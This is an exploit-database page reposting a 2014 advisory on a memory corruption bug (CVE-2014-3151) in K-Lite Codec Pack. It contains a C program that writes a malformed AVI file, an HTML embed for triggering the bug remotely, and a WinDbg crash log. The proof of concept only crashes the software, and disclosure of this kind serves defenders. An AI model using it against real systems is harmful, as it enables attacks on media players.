首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
K-Lite CODEC 9.x Memory Corruption
来源:vfocus.net 作者:Aryan 发布时间:2014-05-06   
# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]
# Date: [2014/05/3]
# Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.codecguide.com]
# Software Link: [
http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]
# Version: [version 9.x and prior]
# Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit]
# CVE : [CVE-2014-3151]
# Found by Piece Dumb Fuzzer

details:

K-lite codec version 9.x and prior to that are vulnerable to a memory
corruption vulnerability which allows remote attackers to execute arbitrary
code execution to control the remote system via a malformed AVI file format
.

Tested on "Windows Media player latest edition", Internet explorer, GOM
Player & KM player, Windows XP, 7 x64 & x86 .

--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger memory corruption :

#include<stdio.h>
#include<stdlib.h>
#include<windows.h>

unsigned char sc[154] =
{
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20,
0x4C, 0x49, 0x53, 0x54,
    0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E,
0xFC, 0xFF, 0xFF, 0xFF,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
} ;
int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;
    fileHandle =
CreateFile("d:\\poc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    if(fileHandle == INVALID_HANDLE_VALUE)
    {
        printf("(-)Failed to Create File");
        exit(0);
    }else{
         printf("(+) Writing File ...");
         WriteFile(fileHandle,sc,154,&dwBytesWritten,NULL);
    }
    CloseHandle(fileHandle);
    return 0;
}


--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to Remote trigger memory corruption :


<embed type="application/x-mplayer2" pluginspage="
http://www.microsoft.com/Windows/MediaPlayer/"
name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false"
autostart="false"
height="330" width="360" loop="false" src="D:/PoC.avi" />



windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000   C:\Program Files\Windows Media
Player\wmplayer.exe
ModLoad: 7c900000 7c9b2000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 12950000 133b5000   C:\WINDOWS\system32\wmp.dll
ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 75a70000 75a91000   C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 59a60000 59b01000   C:\WINDOWS\system32\dbghelp.dll
ModLoad: 13740000 13f1b000   C:\WINDOWS\system32\wmploc.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 00ba0000 00e65000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 4ec50000 4edf6000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
ModLoad: 7e720000 7e7d0000   C:\WINDOWS\system32\SXS.DLL
ModLoad: 0d780000 0d7be000   C:\Program Files\Windows Media Player\mpvis.dll
ModLoad: 63000000 630e6000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01400000 01409000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 15110000 1536c000   C:\WINDOWS\system32\wmvcore.dll
ModLoad: 11c70000 11caa000   C:\WINDOWS\system32\WMASF.DLL
ModLoad: 76380000 76385000   C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 77690000 776b1000   C:\WINDOWS\system32\NTMARTA.DLL
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 0bef0000 0bf27000   C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 61da0000 61db0000   C:\WINDOWS\system32\mcicda.dll
ModLoad: 0e510000 0e562000   C:\WINDOWS\system32\mswmdm.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 5b860000 5b8b6000   C:\WINDOWS\system32\netapi32.dll
ModLoad: 0dfb0000 0dfe9000   C:\WINDOWS\system32\mspmsp.dll
ModLoad: 07940000 0797b000   C:\WINDOWS\system32\cewmdm.dll
ModLoad: 11d10000 11d1d000   C:\WINDOWS\system32\wmdmps.dll
ModLoad: 62bf0000 62c22000   C:\WINDOWS\system32\upnphost.dll
ModLoad: 4d4f0000 4d549000   C:\WINDOWS\system32\WINHTTP.dll
ModLoad: 74f00000 74f0c000   C:\WINDOWS\system32\SSDPAPI.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 13fe0000 14014000   C:\Program Files\Windows Media
Player\wmpnssci.dll
ModLoad: 109c0000 109ec000   C:\WINDOWS\system32\PortableDeviceTypes.dll
ModLoad: 10930000 10979000   C:\WINDOWS\system32\PortableDeviceApi.dll
ModLoad: 0e020000 0e089000   C:\WINDOWS\system32\MSSCP.dll
ModLoad: 75cf0000 75d81000   C:\WINDOWS\system32\mlang.dll
ModLoad: 08b70000 08c65000   C:\WINDOWS\system32\drmv2clt.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 77c70000 77c94000   C:\WINDOWS\system32\msv1_0.dll
ModLoad: 722b0000 722b5000   C:\WINDOWS\system32\sensapi.dll
ModLoad: 14030000 14054000   C:\WINDOWS\system32\wmpps.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 10000000 10008000   C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
ModLoad: 5cb00000 5cb6e000   C:\WINDOWS\system32\shimgvw.dll
ModLoad: 38a70000 38a7c000
C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
ModLoad: 78130000 781cb000
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 02f30000 02f9e000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000   C:\Program Files\K-Lite Codec
Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio
Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240
edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]
ds:0023:41414141=????????

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Laser Jet - JavaScript Pers
·KM Player 3.8.0.123 Stack Buff
·F5 BIG-IQ 4.1.0.2013.0 - Privi
·Windows NTUserMessageCall Win3
·Apache Struts ClassLoader Mani
·Adobe Flash Player Integer Und
·AlienVault OSSIM SQL Injection
·Linux kernel multiple security
·Adobe Flash Player Type Confus
·Night Lion Security PHP Stress
·SEP Manager 12.1.2015.2015 Ove
·GOM Player 2.2.57.5189 Memory
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved